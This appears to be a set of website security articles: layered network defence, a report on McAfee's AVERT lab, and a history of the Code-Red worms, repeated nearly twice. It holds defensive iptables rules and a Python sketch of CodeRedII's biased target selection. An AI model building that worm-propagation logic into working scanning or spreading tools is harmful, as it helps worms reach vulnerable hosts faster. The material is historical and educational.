Active Directory is also a key tool for administrators that manage user nodes running WXP and Windows 2000. With Group Policies for Active Directory you can prevent specified software from running on a Windows XP user node.

To do this use the “Software Restriction Policy”. You can then blacklist specific software based on any of the following:

  • A hash value of the software
  • A digital certificate for the software
  • The path to the executable
  • Internet Zone rules

File, Folder and Share access

On the server all user access to files, folders and shares should be locked down via NTFS (requires Windows NT or higher). Use the concept of minimal necessary privilege.

User Node Connectivity

The firewall in Service Pack 2 for Windows XP (released 25 August 2004) can be used to limit what ports are open to incoming connections on the Windows XP user node.

Wireless

As wireless becomes more widely deployed and integrated more deeply in day-to-day operations we need to manage security and reliability. It is estimated by Lynx that wireless installations can provide up to a 40% reduction in installation costs over standard fixed line installations. But wireless and the ubiquity of the web mean that the network perimeter is now on the user node's desktop.

NAC and NAP, introduced earlier, will work with Extensible Authentication Protocol-Transport Level Security (EAP-TLS). EAP-TLS is used as a wireless authentication protocol. This means the wireless user node can still be managed for patching, AV and security compliance on the same basis as fixed line (e.g. Ethernet) connected user nodes.

EAP-TLS is scalable but requires Windows 2000 and Active Directory with Group Policy. To encrypt wireless traffic, 802.1x is recommended and if you wanted to investigate single sign on for your users across the domain then you could look at Public Key Infrastructure (PKI).

As part of your network and security auditing you will want to check the wireless aspect and the netstumbler tool will run on a wireless client and report on any wireless networks that have sufficient strength to be picked up.

As a part of your physical security for wireless networking you should consider placing Wireless Access Points (WAPs) in locations that provide restricted user access, for example in the ceiling cavity. Of course you will need to ensure that you achieve the right balance of physical security and usability, making sure that the signal is still strong enough to be used.

Layer 8 of the OSI model

The user was jokingly referred to as being the eighth layer in the OSI model and it is here that social engineering and other non-technical reconnaissance and attack methods can be attempted. Kevin Mitnick has written “The Art Of Deception: Controlling The Human Element Of Security” which is highly regarded in the IT security environment.

One counter measure to employ for social engineering is ensuring that all physical material is disposed of securely. This includes internal phone lists, hard copy documents, software user manuals etc. User education is one of the most important actions, so you could consider user-friendly training with workshops and reminders (posters, email memos, briefings) to create a security-conscious workplace.

Free Microsoft Security Tools

MBSA, mentioned earlier, helps audit the security configuration of a user/server node. Other free Microsoft tools are the Exchange Best Practice Analyser, SQL Best Practice Analyser and the Microsoft Audit Collection System.

For conducting event log analysis you could use the Windows Server 2003 Resource Kit tool called EventcombMT. User education can be enhanced with visual reminders like a login message or posters promoting password security.

For developing operational guidelines the IT Infrastructure Library (ITIL) provides a comprehensive and customisable solution. ITIL was developed by the UK government and is now used internationally. Microsoft's own framework, the Microsoft Operations Framework, draws from ITIL. There is also assistance in designing and maintaining a secure network provided free by Microsoft, called the “Security Operations Guide”.

Summary

Overall then, the aim is to provide layers of defence. For this you could use a Cisco PIX as your hardware firewall (first firewall) with Microsoft ISA 2004 as your application layer firewall (second firewall). You may also use additional ISA 2004 servers as internal firewalls to screen branch-to-Head-Office traffic.

The user node will authenticate to the domain. Cisco NAC and Microsoft NAQC/NAP will provide security auditing, authentication and enforcement for user nodes connecting to the LAN before they gain authorisation. If any action is required to make the user node meet the specified corporate security policies, this will be carried out by moving the user node to a restricted part of the network.

Once the user node is authenticated, authorised and compliant with the corporate security policy then it will be allowed to connect to its full, allowed rights as part of the Private network. If using wireless the EAP-TLS may be used for the authentication and 802.1x for the encryption of the wireless traffic.

To help strengthen the LAN if the outer perimeter is defeated you need to look at segmenting the network. This will help minimise or delay malicious and undesirable activity from spreading throughout your private network. VLANs will assist with creating workgroups based on job function, allowing you to restrict the scope of network access a user may have.

For example, rather than any user being able to browse to the Payroll server, you can use VLANs to restrict access to that server to only the HR department. Routers can help to minimise the spread of network worms and undesirable traffic by introducing Access Control Lists (ACLs).
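
Where the filtering is done on a Linux-based router or firewall rather than a Cisco device, a rough iptables sketch of the same idea might look like this (the addresses are purely illustrative: the Payroll server is assumed to be 192.168.10.5 and the HR VLAN 192.168.20.0/24):

iptables -A FORWARD -s 192.168.20.0/24 -d 192.168.10.5 -j ACCEPT   # HR may reach Payroll
iptables -A FORWARD -d 192.168.10.5 -j DROP                        # everyone else is blocked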

To minimise the chance of “island hopping”, where a compromised machine is used to target another machine, you should ensure that the OS of all clients and servers is hardened as much as possible – remove unnecessary services, patch, remove default admin shares if not used and enforce complex passwords.

Also stop clients from having easy access to another client machine unless it is necessary. Instead build more secure client-to-server access. The server will typically have better security because it is part of a smaller group of machines, thus more manageable, and it is also a higher-profile machine.

Applications should be patched and counter measures put in place for known vulnerabilities. This includes Microsoft Exchange, SQL and IIS, which are high on a malicious hacker's attack list. The data on the servers can then be secured using NTFS permissions to only permit those who are authorised to access the data in the manner you specify.

Overall the presentation showed me that a more integrated approach to network security is being taken by vendors. Interoperability is going to be important to ensure the longevity of your solution, but it is refreshing to see two large players in the IT industry like Cisco and Microsoft working together.

  • Hits: 37873

A Day In The Antivirus World

This article, written by Campbell Taylor ('Global'), is a review of the information learnt from a one-day visit to McAfee and includes personal observations or further information that he felt was useful to the overall article. He refers to malicious activity as a term to cover the range of activity that includes worms, viruses, backdoors, Trojans, and exploits. Italics indicate a personal observation or comment.

In December 2004 I was invited to a one-day workshop at McAfee's offices and AVERT lab at Aylesbury in England. As you are probably aware, McAfee is an anti-virus (AV) vendor and AVERT (Anti-Virus Emergency Response Team) is McAfee's AV research lab.

This visit is the basis for the information in this document and is split into 4 parts:

1) THREAT TRENDS

2) SECURITY TRENDS

3) SOME OF TODAY'S SECURITY RESPONSES

4) AVERT LAB VISIT

Threat Trends

Infection by Browsing

Browsing looks set to become a bigger method of infection by a virus in the near future, but there was also concern about the potential for 'media-independent propagation by a virus', which I found very interesting.

 

Media Independent propagation

By media independent I mean that the virus is not constrained to travelling over any specific media like Ethernet or via other physical infrastructure installations. McAfee's research showed a security risk with wireless network deployment which is discussed in the Security Trends section of this document.

So what happens if a virus or worm were able to infect a desktop via any common method and that desktop was part of a wired and wireless network? Instead of just searching the fixed wire LAN for targets, the virus/worm looks for wireless networks that are of sufficient strength to allow it to jump into that network.

You can draw up any number of implications from this but my personal observation is that this means you have to consider the wireless attack vector as seriously as the fixed wire attack vector. This reinforces the concept that the network perimeter is no longer based on the Internet/Corporate LAN perimeter and instead it now sits wherever interaction between the host machine and foreign material exists. This could be the USB memory key from home, files accessed on a compromised server or the web browser accessing a website.

An interesting observation from the McAfee researcher was that this would mean a virus/worm distribution starting to follow a more biological distribution. In other words you would see concentrations of the virus in metropolitan areas and along key meeting places like cyber cafes or hotspots.

Distributed Denial of Service (DDoS)

DDoS attacks are seen as a continuing threat because of the involvement of criminals in the malicious hacker/cracker world. Using DDoS for extortion provides criminals with a remote-control method of raising capital.

Virus writers are starting to instruct their bot armies to coordinate their time keeping by accessing Internet-based time servers. This means that all bots are using a consistent time reference. In turn this makes any DDoS that much more effective than relying on independent sources of time reference.

As a personal note, network administrators and IT security people might consider who needs access to Internet-based time servers. You might think about applying an access control list (ACL) that only permits NTP from one specified server in your network and denies all other NTP traffic. The objective is to reduce the chances of any of your machines being used as part of a bot army for DDoS attacks.
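
On a Linux-based firewall such an ACL could be sketched with iptables along the following lines (192.168.1.10 is an assumed address for your designated internal time server; adapt it to your own network):

iptables -A FORWARD -p udp --dport 123 -s 192.168.1.10 -j ACCEPT   # allow NTP from the approved server
iptables -A FORWARD -p udp --dport 123 -j DROP                     # drop NTP from everything else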

Identity Theft

This was highlighted as a significant likely trend in the near future and is part of the increase in Phishing attacks that have been intercepted by MessageLabs.

SOCKS used in sophisticated identity theft

McAfee did not go into a lot of detail about this but they pointed out that SOCKS is being used by malicious hackers to bypass corporate firewalls because SOCKS is a proxy service. I don't know much about SOCKS so this is more of a heads up about technologies being used maliciously in the connected world.

Privacy versus security

One of the speakers raised the challenge of privacy versus security. Here the challenge is promoting the use of encrypted traffic to provide protection for data whilst in transit but then the encrypted traffic is more difficult to scan with AV products. In some UK government networks no encrypted traffic is allowed so that all traffic can be scanned.

In my opinion this is going to become more of an issue as consumers and corporates create a demand for the perceived security of HTTPS, for example.

Flexibility versus security

In the McAfee speaker's words this is about “ease of use versus ease of abuse”. If security makes IT too difficult to use effectively then end users will circumvent security.

Sticky notes with passwords on the monitor anyone?


Security Trends

Wireless Security

Research by McAfee showed that, on average, 60% of all wireless networks were deployed insecurely (many without even the use of WEP keys).

The research was conducted by war driving with a laptop running NetStumbler in London and Reading (United Kingdom) and Amsterdam (Netherlands). The research also found that in many locations in major metropolitan areas there was often an overlap of several wireless networks of sufficient strength to attempt a connection.

AV product developments

AV companies are developing and distributing AV products for Personal Digital Assistants (PDAs) and smart phones. For example, F-secure, a Finnish AV firm, is providing AV software for Nokia (which, not surprisingly is based in Finland).

We were told that standard desktop AV products are limited to being reactive in many instances, as they cannot detect a virus until it is written to hard disk. Therefore, in a Windows environment - with Instant Messaging, Outlook Express and web surfing with Internet Explorer - the user is exposed, as web content is not necessarily written to hard disk.

This is where the concept of desktop firewalls or buffer overflow protection is important. McAfee's newest desktop product, VirusScan 8.0i, offers access protection that is designed to prevent undesired remote connections; it also offers buffer overflow protection. However it is also suggested that a firewall would be useful to stop network worms.

An interesting program that the speaker mentioned (obviously out of earshot of the sales department) was the Proxomitron. The way it was explained to me was that Proxomitron is a local web proxy. It means that web content is written to the hard disk and then the web browser retrieves the web content from the proxy. Because the web content has been written to hard disk your standard desktop AV product can scan for malicious content.

I should clarify at this point that core enterprise/server AV solutions like firewall/web filtering and email AV products are designed to scan in memory as well as the hard disk.

I guess it is to minimise the footprint and performance impact that the desktop AV doesn't scan memory. No doubt marketing is another factor – why kill off your corporate market when it generates substantial income?

AV vendors forming partnerships with Network infrastructure vendors

Daily AV definition file releases

McAfee is moving to daily definition releases in an attempt to minimise the window of opportunity for infection.

Malicious activity naming

A consistent naming convention that is vendor independent is run by CVE (Common Vulnerabilities and Exposures). McAfee will be including the CVE reference for malicious activity that is ranked by McAfee as being of medium threat or higher.

Other vendors may use a different approach, but I feel the use of a common reference method will help people in the IT industry to correlate data about malicious activity from different sources, rather than the often painful (for me at least) hunting exercise we engage in to get material from different vendors or sources about malicious activity.

AV products moving from reactive detection to proactive blocking of suspect behaviour

New AV products from McAfee (for example VirusScan 8.0i) are including suspect behaviour detection and blocking as well as virus signature detection. This acknowledges that virus detection by a virus signature is a reactive action. So by blocking suspicious behaviour you can prevent potential virus activity before a virus signature has been developed. For example port blocking can be used to stop a mydoom style virus from opening ports for backdoor access.

A personal observation is that Windows XP Service Pack 2 does offer a Firewall but this is a limited firewall as it provides port blocking only for traffic attempting to connect to the host. Therefore it would not stop a network worm searching for vulnerable targets.

Some of Today's Security Responses

Detecting potential malicious activity - Network

Understand your network's traffic patterns and develop a baseline of network traffic. If you see a significant unexpected change in your network traffic you may be seeing the symptoms of malicious activity.
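
One low-tech way to start building such a baseline on a Linux monitoring host is to capture a traffic sample at regular intervals and compare the protocol and port breakdowns over time; for example (assuming tcpdump is installed and eth0 is the interface you want to watch):

tcpdump -i eth0 -c 100000 -w baseline-$(date +%Y%m%d).pcap   # capture 100,000 packets to a dated file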

Detecting potential malicious activity - Client workstation

On a Windows workstation, if you run "netstat -a" from the command line you can see the ports that the workstation has open and to whom it is trying to connect. If you see ports open that are unexpected, especially ones outside of the well-known range (1 – 1024), or connections to unexpected IP addresses, then further investigation may be worthwhile.
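
If the output is long you can narrow it down to just the listening ports; on Windows, for example, something like the following should work (findstr is the built-in text filter):

netstat -an | findstr LISTENING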

Tightening Corporate Email security

With the prevalence of mass mailing worms and viruses McAfee offered a couple of no/low cost steps that help to tighten your email security.

  1. Prevent all SMTP traffic inbound/outbound that is not to or from your SMTP server (a firewall sketch follows this list)
  2. Prevent MX record lookups
  3. Create a honeypot email address in your corporate email address book so that any mass mail infections will send an email to this honeypot account and alert you to the infection. It was suggested that the email account be inconspicuous e.g. not containing any admin, net, help, strings in the address. Something like '#_#@your domain' would probably work.
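
For the first point, a rough iptables sketch on a Linux perimeter firewall might look like this (192.168.1.25 is an assumed address for your SMTP server; adapt it to your own environment):

iptables -A FORWARD -p tcp --dport 25 -s 192.168.1.25 -j ACCEPT   # outbound mail from your server
iptables -A FORWARD -p tcp --dport 25 -d 192.168.1.25 -j ACCEPT   # inbound mail to your server
iptables -A FORWARD -p tcp --dport 25 -j DROP                     # all other SMTP is blocked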

AVERT LAB VISIT

We were taken to the AVERT labs where we were shown the path from the submission of a suspected malicious sample through to the testing of the suspect sample and then to the development of the removal tools and definition files, their testing and deployment.

Samples are collected by submission via email, removable media via mail (e.g. CD or floppy disk) or captured via AVERT's honeypots in the wild.

Once a sample is received a copy is run on a goat rig. A goat rig is a test/sacrificial machine. The phrase “goat rig” comes from the practice in the past of tethering a goat in a clearing to attract animals the hunter wanted to capture. In this case the goat rig was a powerful workstation running several virtual machines courtesy of VMware software that were in a simulated LAN. The simulation went so far as to include a simulated access point to the Internet and Internet based DNS server.

The sample is run on the goat rig for observational tests. Observational tests are the first tests conducted after the sample has been scanned for known malicious signature files. Naturally malicious activity is not often visible to the common end user, so observable activity means executing the sample and looking for files or registry keys created by the sample, new ports opened and unexpected suspicious network traffic from the test machine.

As a demonstration the lab technicians ran a sample of the mydoom virus and the observable behaviour at this point was the opening of port 3127 on the test host, unexpected network traffic from the test host and newly created registry keys. The lab technician pointed out that a firewall on the host, blocking unused ports, would have very easily prevented mydoom from spreading.

Following observational tests the sample will be submitted for reverse engineering if it's considered complex enough or it warrants further investigation.

AVERT engineers that carry out reverse engineering are located throughout the world, and I found it interesting that these reverse engineers and top AV researchers maintain contact with their peers at the other main AV vendors. This collaboration is not maintained by the AV vendors but by the AV engineers, so it is based on a trust relationship. This means that the knowledge about a sample that has been successfully identified and reverse engineered to identify payload, characteristics etc. is passed to others in the AV trust group.

From the test lab we went through to the AV definition testing lab. After the detection rules and a new AV definition have been written the definition is submitted to this lab. The lab runs an automated test that applies the updated AV definition on most known Operating System platforms and against a wide reference store of known applications.

The intention is to prevent the updated AV definition from giving false positives on known safe applications.

Imagine the grief if an updated AV definition provided a false positive on Microsoft's Notepad!

One poor soul was in a corner busy surfing the web and downloading all available material to add to their reference store of applications for testing future AV definitions.

After passing the reference store test an email is sent to all subscribers of the McAfee DAT notification service and the updated AV definition is made available on the McAfee website for download.

In summary, the AVERT lab tour was an informative look behind the scenes, without much of a sales pitch, and I found the co-operation amongst AV researchers of different AV companies very interesting.

  • Hits: 39730

Code-Red Worms: A Global Threat

The first incarnation of the Code-Red worm (CRv1) began to infect hosts running unpatched versions of Microsoft's IIS webserver on July 12th, 2001. The first version of the worm uses a static seed for its random number generator. Then, around 10:00 UTC in the morning of July 19th, 2001, a random seed variant of the Code-Red worm (CRv2) appeared and spread. This second version shared almost all of its code with the first version, but spread much more rapidly. Finally, on August 4th, a new worm began to infect machines exploiting the same vulnerability in Microsoft's IIS webserver as the original Code-Red virus. Although the new worm shared almost no code with the two versions of the original worm, it contained in its source code the string "CodeRedII" and was thus named CodeRed II. The characteristics of each worm are explained in greater detail below.

The IIS .ida Vulnerability

On June 18, 2001 eEye released information about a buffer-overflow vulnerability in Microsoft's IIS webservers.

The remotely exploitable vulnerability was discovered by Riley Hassell. It allows system-level execution of code and thus presents a serious security risk. The buffer-overflow is exploitable because the ISAPI (Internet Server Application Program Interface) .ida (indexing service) filter fails to perform adequate bounds checking on its input buffers.

Code-Red version 1 (CRv1)

On July 12, 2001, a worm began to exploit the aforementioned buffer-overflow vulnerability in Microsoft's IIS webservers. Upon infecting a machine, the worm checks to see if the date (as kept by the system clock) is between the first and the nineteenth of the month. If so, the worm generates a random list of IP addresses and probes each machine on the list in an attempt to infect as many computers as possible. However, this first version of the worm uses a static seed in its random number generator and thus generates identical lists of IP addresses on each infected machine.

The first version of the worm spread slowly, because each infected machine began to spread the worm by probing machines that were either infected or impregnable. The worm is programmed to stop infecting other machines on the 20th of every month. In its next attack phase, the worm launches a Denial-of-Service attack against www1.whitehouse.gov from the 20th-28th of each month.

On July 13th, Ryan Permeh and Marc Maiffret at eEye Digital Security received logs of attacks by the worm and worked through the night to disassemble and analyze the worm. They christened the worm "Code-Red" both because the highly caffeinated "Code Red" Mountain Dew fueled their efforts to understand the workings of the worm and because the worm defaces some web pages with the phrase "Hacked by Chinese". There is no evidence either supporting or refuting the involvement of Chinese hackers with the Code-Red worm.

The first version of the Code-Red worm caused very little damage. The worm did deface web pages on some machines with the phrase "Hacked by Chinese." Although the worm's attempts to spread itself consumed resources on infected machines and local area networks, it had little impact on global resources.

The Code-Red version 1 worm is memory resident, so an infected machine can be disinfected by simply rebooting it. However, once-rebooted, the machine is still vulnerable to repeat infection. Any machines infected by Code-Red version 1 and subsequently rebooted were likely to be reinfected, because each newly infected machine probes the same list of IP addresses in the same order.

Code-Red version 2

At approximately 10:00 UTC in the morning of July 19th, 2001 a random seed variant of the Code-Red worm (CRv2) began to infect hosts running unpatched versions of Microsoft's IIS webserver. The worm again spreads by probing random IP addresses and infecting all hosts vulnerable to the IIS exploit. Code-Red version 2 lacks the static seed found in the random number generator of Code-Red version 1. In contrast, Code-Red version 2 uses a random seed, so each infected computer tries to infect a different list of randomly generated IP addresses. This seemingly minor change had a major impact: more than 359,000 machines were infected with Code-Red version 2 in just fourteen hours.

Because Code-Red version 2 is identical to Code-Red version 1 in all respects except the seed for its random number generator, its only actual damage is the "Hacked by Chinese" message added to top level webpages on some hosts. However, Code-Red version 2 had a greater impact on global infrastructure due to the sheer volume of hosts infected and probes sent to infect new hosts. Code-Red version 2 also wreaked havoc on some additional devices with web interfaces, such as routers, switches, DSL modems, and printers. Although these devices were not infected with the worm, they either crashed or rebooted when an infected machine attempted to send them a copy of the worm.

Like Code-Red version 1, Code-Red version 2 can be removed from a computer simply by rebooting it. However, rebooting the machine does not prevent reinfection once the machine is online again. On July 19th, the probe rate to hosts was so high that many machines were infected as the patch for the .ida vulnerability was applied.

CodeRedII

On August 4, 2001, an entirely new worm, CodeRedII began to exploit the buffer-overflow vulnerability in Microsoft's IIS webservers. Although the new worm is completely unrelated to the original Code-Red worm, the source code of the worm contained the string "CodeRedII" which became the name of the new worm.

Ryan Permeh and Marc Maiffret analyzed CodeRedII to determine its attack mechanism. When a worm infects a new host, it first determines if the system has already been infected. If not, the worm initiates its propagation mechanism, sets up a "backdoor" into the infected machine, becomes dormant for a day, and then reboots the machine. Unlike Code-Red, CodeRedII is not memory resident, so rebooting an infected machine does not eliminate CodeRedII.

After rebooting the machine, the CodeRedII worm begins to spread. If the host infected with CodeRedII has Chinese (Taiwanese) or Chinese (PRC) as the system language, it uses 600 threads to probe other machines. All other machines use 300 threads.

CodeRedII uses a more complex method of selecting hosts to probe than Code-Red. CodeRedII generates a random IP address and then applies a mask to produce the IP address to probe. The length of the mask determines the similarity between the IP address of the infected machine and the probed machine. 1/8th of the time, CodeRedII probes a completely random IP address. 1/2 of the time, CodeRedII probes a machine in the same /8 (so if the infected machine had the IP address 10.9.8.7, the IP address probed would start with 10.), while 3/8ths of the time, it probes a machine on the same /16 (so the IP address probed would start with 10.9.).
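
To make the bias concrete, here is a small illustrative shell sketch of that selection logic (this is not the worm's actual code, just a way to visualise the 1/8, 1/2 and 3/8 split; A and B stand for the first two octets of the infected host's address, and the multicast/loopback exclusions described below are ignored):

pick_target() {
    local A=$1 B=$2
    local roll=$((RANDOM % 8))
    if [ $roll -eq 0 ]; then     # 1/8 of the time: a completely random address
        echo "$((RANDOM % 256)).$((RANDOM % 256)).$((RANDOM % 256)).$((RANDOM % 256))"
    elif [ $roll -le 4 ]; then   # 4/8 of the time: same /8 as the infected host
        echo "$A.$((RANDOM % 256)).$((RANDOM % 256)).$((RANDOM % 256))"
    else                         # 3/8 of the time: same /16 as the infected host
        echo "$A.$B.$((RANDOM % 256)).$((RANDOM % 256))"
    fi
}
pick_target 10 9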

Like Code-Red, CodeRedII avoids probing IP addresses in 224.0.0.0/8 (multicast) and 127.0.0.0/8 (loopback). The bias towards the local /16 and /8 networks means that an infected machine may be more likely to probe a susceptible machine, based on the supposition that machines on a single network are more likely to be running the same software as machines on unrelated IP addresses.

The CodeRedII worm is much more dangerous than Code-Red because CodeRedII installs a mechanism for remote, root-level access to the infected machine. Unlike Code-Red, CodeRedII neither defaces web pages on infected machines nor launches a Denial-of-Service attack. However, the backdoor installed on the machine allows any code to be executed, so the machines could be used as zombies for future attacks (DoS or otherwise).

A machine infected with CodeRedII must be patched to prevent reinfection and then the CodeRedII worm must be removed. A security patch for this vulnerability is available from Microsoft at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp. A tool that disinfects a computer infected with CodeRedII is also available: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878.

CAIDA Analysis

CAIDA's ongoing analysis of the Code-Red worms includes a detailed analysis of the spread of Code-Red version 2 on July 19, 2001, a follow-up survey of the patch rate of machines infected on July 19th, and dynamic graphs showing the prevalence of Code-Red version 2 and CodeRedII worldwide.

The Spread of the Code-Red Worm (CRv2)

An analysis of the spread of the Code-Red version 2 worm between midnight UTC July 19, 2001 and midnight UTC July 20, 2001.

On July 19, 2001 more than 359,000 computers were infected with the Code-Red (CRv2) worm in less than 14 hours. At the peak of the infection frenzy, more than 2,000 new hosts were infected each minute. 43% of all infected hosts were in the United States, while 11% originated in Korea followed by 5% in China and 4% in Taiwan. The .NET Top Level Domain (TLD) accounted for 19% of all compromised machines, followed by .COM with 14% and .EDU with 2%. We also observed 136 (0.04%) .MIL and 213 (0.05%) .GOV hosts infected by the worm. An animation of the geographic expansion of the worm is available.

Animations

To help us visualize the initial spread of Code-Red version 2, Jeff Brown created an animation of the geographic spread of the worm in five minute intervals between midnight UTC on July 19, 2001 and midnight UTC on July 20, 2001. For the animation, infected hosts were mapped to latitude and longitude values using ipmapper, and aggregated by the number at each unique location. The radius of each circle is sized relative to the infected hosts mapped to the center of the circle using the formula 1+ln(total-infected-hosts). When smaller circles are obscured by larger circles, their totals are not combined with the larger circle; the smaller data points are hidden from view.

Although we attempted to identify the geographic location of each host as accurately
as possible, in many cases the granularity of the location was limited to the country of origin. We plot these hosts at the center of their respective countries. Thus, the rapidly expanding central regions of most countries is an artifact of the localization method.

Animations created by Jeff Brown (UCSD CSE department), based on analysis by David Moore (CAIDA at SDSC).
Copyright UC Regents 2001.

About Code-Red

The first incarnation of the Code-Red worm (CRv1) began to infect hosts running unpatched versions of Microsoft's IIS webserver on July 12th, 2001. The first version of the worm uses a static seed for its random number generator. Then, around 10:00 UTC in the morning of July 19th, 2001, a random-seed variant of the Code-Red worm (CRv2) appeared and spread. This second version shared almost all of its code with the first version, but spread much more rapidly. Finally, on August 4th, a new worm began to infect machines, exploiting the same vulnerability in Microsoft's IIS webservers as the original Code-Red worm. Although the new worm shared almost no code with the two versions of the original worm, its source code contained the string "CodeRedII" and it was thus named CodeRedII. The characteristics of each worm are explained in greater detail below.

The IIS .ida Vulnerability

Detailed information about the IIS .ida vulnerability can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AD20010618.html).

On June 18, 2001 eEye released information about a buffer-overflow vulnerability in Microsoft's IIS webservers.

The remotely exploitable vulnerability was discovered by Riley Hassell. It allows system-level execution of code and thus presents a serious security risk. The buffer-overflow is exploitable because the ISAPI (Internet Server Application Program Interface) .ida (indexing service) filter fails to perform adequate bounds checking on its input buffers.

A security patch for this vulnerability is available from Microsoft at
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp.


Code-Red version 1 (CRv1)

Detailed information about Code-Red version 1 can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AL20010717.html).

On July 12, 2001, a worm began to exploit the aforementioned buffer-overflow vulnerability in Microsoft's IIS webservers. Upon infecting a machine, the worm checks to see if the date (as kept by the system clock) is between the first and the nineteenth of the month. If so, the worm generates a random list of IP addresses and probes each machine on the list in an attempt to infect as many computers as possible. However, this first version of the worm uses a static seed in its random number generator and thus generates identical lists of IP addresses on each infected machine.

The first version of the worm spread slowly, because each infected machine began to spread the worm by probing machines that were either infected or impregnable. The worm is programmed to stop infecting other machines on the 20th of every month. In its next attack phase, the worm launches a Denial-of-Service attack against www1.whitehouse.gov from the 20th-28th of each month.

On July 13th, Ryan Permeh and Marc Maiffret at eEye Digital Security received logs of attacks by the worm and worked through the night to disassemble and analyze the worm. They christened the worm "Code-Red" both because the highly caffeinated "Code Red" Mountain Dew fueled their efforts to understand the workings of the worm and because the worm defaces some web pages with the phrase "Hacked by Chinese". There is no evidence either supporting or refuting the involvement of Chinese hackers with the Code-Red worm.

The first version of the Code-Red worm caused very little damage. The worm did deface web pages on some machines with the phrase "Hacked by Chinese." Although the worm's attempts to spread itself consumed resources on infected machines and local area networks, it had little impact on global resources.

The Code-Red version 1 worm is memory resident, so an infected machine can be disinfected by simply rebooting it. However, once rebooted, the machine is still vulnerable to repeat infection. Any machine infected by Code-Red version 1 and subsequently rebooted was likely to be reinfected, because each newly infected machine probes the same list of IP addresses in the same order.
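The practical effect of the seed choice is easy to demonstrate. The sketch below is illustrative Python only, not worm code; the seed values and list length are made up. It shows why a fixed seed makes every infected host walk the same probe list, while per-host seeds make the lists diverge:

import random

def probe_list(seed, count=5):
    # Reproducible list of pseudo-random 32-bit values standing in for probe targets.
    rng = random.Random(seed)
    return [rng.getrandbits(32) for _ in range(count)]

# CRv1-style behaviour: every host uses the same static seed,
# so all hosts generate an identical probe order.
host_a = probe_list(seed=0x12345678)
host_b = probe_list(seed=0x12345678)
print(host_a == host_b)   # True - identical lists, so the same targets are hit over and over

# CRv2-style behaviour: each host seeds its generator differently,
# so the probe orders diverge and coverage of the address space grows quickly.
host_c = probe_list(seed=random.SystemRandom().getrandbits(32))
host_d = probe_list(seed=random.SystemRandom().getrandbits(32))
print(host_c == host_d)   # almost certainly False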


Code-Red version 2

Detailed information about Code-Red version 2 can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AL20010717.html) and silicon defense (http://www.silicondefense.com/cr/).

At approximately 10:00 UTC on the morning of July 19th, 2001, a random-seed variant of the Code-Red worm (CRv2) began to infect hosts running unpatched versions of Microsoft's IIS webserver. The worm again spreads by probing random IP addresses and infecting all hosts vulnerable to the IIS exploit. Code-Red version 2 lacks the static seed found in the random number generator of Code-Red version 1. Instead, Code-Red version 2 uses a random seed, so each infected computer tries to infect a different list of randomly generated IP addresses. This seemingly minor change had a major impact: more than 359,000 machines were infected with Code-Red version 2 in just fourteen hours.

Because Code-Red version 2 is identical to Code-Red version 1 in all respects except the seed for its random number generator, its only actual damage is the "Hacked by Chinese" message added to top level webpages on some hosts. However, Code-Red version 2 had a greater impact on global infrastructure due to the sheer volume of hosts infected and probes sent to infect new hosts. Code-Red version 2 also wreaked havoc on some additional devices with web interfaces, such as routers, switches, DSL modems, and printers. Although these devices were not infected with the worm, they either crashed or rebooted when an infected machine attempted to send them a copy of the worm.

Like Code-Red version 1, Code-Red version 2 can be removed from a computer simply by rebooting it. However, rebooting the machine does not prevent reinfection once the machine is online again. On July 19th, the probe rate to hosts was so high that many machines were infected as the patch for the .ida vulnerability was applied.


CodeRedII

Detailed information about CodeRedII can be found at eEye (http://www.eeye.com/html/Research/Advisories/AL20010804.html) and http://aris.securityfocus.com/alerts/codered2/.

On August 4, 2001, an entirely new worm, CodeRedII, began to exploit the buffer-overflow vulnerability in Microsoft's IIS webservers. Although the new worm is completely unrelated to the original Code-Red worm, its source code contained the string "CodeRedII", which became the name of the new worm.

Ryan Permeh and Marc Maiffret analyzed CodeRedII to determine its attack mechanism. When the worm infects a new host, it first determines whether the system has already been infected. If not, the worm initiates its propagation mechanism, sets up a "backdoor" into the infected machine, becomes dormant for a day, and then reboots the machine. Unlike Code-Red, CodeRedII is not memory resident, so rebooting an infected machine does not eliminate it.

After rebooting the machine, the CodeRedII worm begins to spread. If the host infected with CodeRedII has Chinese (Taiwanese) or Chinese (PRC) as the system language, it uses 600 threads to probe other machines. All other machines use 300 threads.

CodeRedII uses a more complex method of selecting hosts to probe than Code-Red. CodeRedII generates a random IP address and then applies a mask to produce the IP address to probe. The length of the mask determines the similarity between the IP address of the infected machine and the probed machine. 1/8th of the time, CodeRedII probes a completely random IP address. 1/2 of the time, CodeRedII probes a machine in the same /8 (so if the infected machine had the IP address 10.9.8.7, the IP address probed would start with 10.), while 3/8ths of the time, it probes a machine on the same /16 (so the IP address probed would start with 10.9.).

Like Code-Red, CodeRedII avoids probing IP addresses in 224.0.0.0/8 (multicast) and 127.0.0.0/8 (loopback). The bias towards the local /16 and /8 networks means that an infected machine may be more likely to probe a susceptible machine, based on the supposition that machines on a single network are more likely to be running the same software as machines on unrelated IP addresses.
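For illustration only, the following Python sketch reproduces the probability mix and excluded ranges described above. It simply generates candidate addresses and performs no network activity; the example address is made up.

import random

def biased_target(local_ip):
    # 1/2 of the time stay in the local /8, 3/8 of the time in the local /16,
    # 1/8 fully random; re-draw anything in 127.0.0.0/8 or 224.0.0.0/8.
    a, b, _, _ = (int(x) for x in local_ip.split("."))
    while True:
        octets = [random.randint(0, 255) for _ in range(4)]
        r = random.random()
        if r < 0.5:                    # same /8 as the "infected" host
            octets[0] = a
        elif r < 0.875:                # same /16 as the "infected" host
            octets[0], octets[1] = a, b
        # else: completely random address
        if octets[0] not in (127, 224):
            return ".".join(str(o) for o in octets)

print(biased_target("10.9.8.7"))       # e.g. 10.9.141.23 or 10.200.5.1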

The CodeRedII worm is much more dangerous than Code-Red because CodeRedII installs a mechanism for remote, root-level access to the infected machine. Unlike Code-Red, CodeRedII neither defaces web pages on infected machines nor launches a Denial-of-Service attack. However, the backdoor installed on the machine allows any code to be executed, so the machines could be used as zombies for future attacks (DoS or otherwise).

